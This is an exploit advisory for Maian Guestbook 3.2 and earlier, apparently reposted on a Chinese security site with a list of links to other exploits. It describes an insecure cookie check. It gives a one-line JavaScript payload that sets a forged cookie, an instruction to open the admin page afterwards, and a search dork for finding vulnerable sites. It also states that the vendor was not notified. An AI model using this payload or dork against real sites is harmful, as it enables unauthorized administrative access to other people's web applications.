Maian Guestbook

所属分类：网络安全 / Exploit 阅读数： 116

收藏 0赞 0分享

-[*] ================================================================================ [*]-
-[*] Maian Guestbook <= 3.2 Insecure Cookie Handling Vulnerability [*]-
-[*] ================================================================================ [*]-

[*] Discovered By: S.W.A.T.
[*] E-Mail: svvateam[at]yahoo[dot]com
[*] Script Download: http://www.maianscriptworld.co.uk
[*] DORK: Powered by Maian Guestbook v3.2

[*] Vendor Has Not Been Notified!

[*] DESCRIPTION:

Maian Guestbook suffers from a insecure cookie, the admin panel only checks if the

cookie exists.
and not the content. so we can easyily craft a cookie and look like a admin.

[*] Vulnerability:

javascript:document.cookie = "gbook_cookie=1; path=/";

[*] NOTE/TIP:

after running the javascript, visit "/admin/index.php" to view admin area.

-[*] ================================================================================ [*]-
-[*] Maian Guestbook <= 3.2 Insecure Cookie Handling Vulnerability [*]-
-[*] ================================================================================ [*]-

更多精彩内容其他人还在看

Maian Guestbook

AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability

PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit

PhotoPost vBGallery 2.4.2 Arbitrary File Upload Vulnerability

HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities

Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability

php Help Agent

Comdev Web Blogger

Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability

Galatolo Web Manager 1.3a

pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability

网络赚钱

站长故事